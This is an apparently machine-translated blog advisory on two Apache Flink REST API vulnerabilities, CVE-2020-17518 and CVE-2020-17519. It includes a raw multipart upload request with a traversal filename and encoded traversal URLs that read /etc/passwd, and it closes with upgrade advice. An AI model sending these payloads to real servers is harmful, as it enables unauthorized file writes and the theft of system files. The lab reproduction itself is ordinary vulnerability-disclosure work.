Shulou(Shulou.com)05/31 Report--

This article introduces you what the Apache Flink file loophole is, the content is very detailed, interested friends can refer to, hope to be helpful to you.

Apache Flink file vulnerability

I. description of vulnerabilities

The core of Apache Flink is a streaming data flow execution engine, which provides functions such as data distribution, data communication and fault tolerance for distributed computing of data streams. REST API was introduced in Flink 1.5.1, but there are many defects in its implementation, which lead to directory traversal.

CVE-2020-17518: file write vulnerability

Using REST API, an attacker can modify the HTTP header and write the uploaded file to any location on the local file system (accessible by the Flink 1.5.1 process).

CVE-2020-17519: file read vulnerability

Apache Flink 1.11.0 allows an attacker to read any file on the JobManager local file system (accessible to the JobManager process) through the REST API of the JobManager process.

Second, influence the version

Apache Flink 1.5.1 ~ 1.11.2

III. Recurrence of loopholes

Environmental address:

Https://github.com/vulhub/vulhub/tree/master/flink/CVE-2020-17518

1. CVE-2020-17518: file writing vulnerability

POST/jars/uploadHTTP/1.1Host: IP:8081Accept-Encoding: gzip, deflateAccept: * / * Accept-Language: enUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Connection: closeContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryoZ8meKnrrso89R6YContent-Length: 189-WebKitFormBoundaryoZ8meKnrrso89R6YContent-Disposition: form-data; name= "jarfile" Filename= ".. / tmp/sucess" success-WebKitFormBoundaryoZ8meKnrrso89R6Y--

Access: file written successfully

Http://ip+port/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fsucess

2. CVE-2020-17519: file reading vulnerability

Http://IP:PORT/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

Access path to get passwd

IV. Suggestions for restoration

All users upgrade to Flink 1.11.3 or 1.12.0, and the download link is:

Https://flink.apache.org/downloads.html

Https://flink.apache.org/downloads.html

On how the Apache Flink file loopholes are shared here, I hope the above content can be of some help to you, can learn more knowledge. If you think the article is good, you can share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.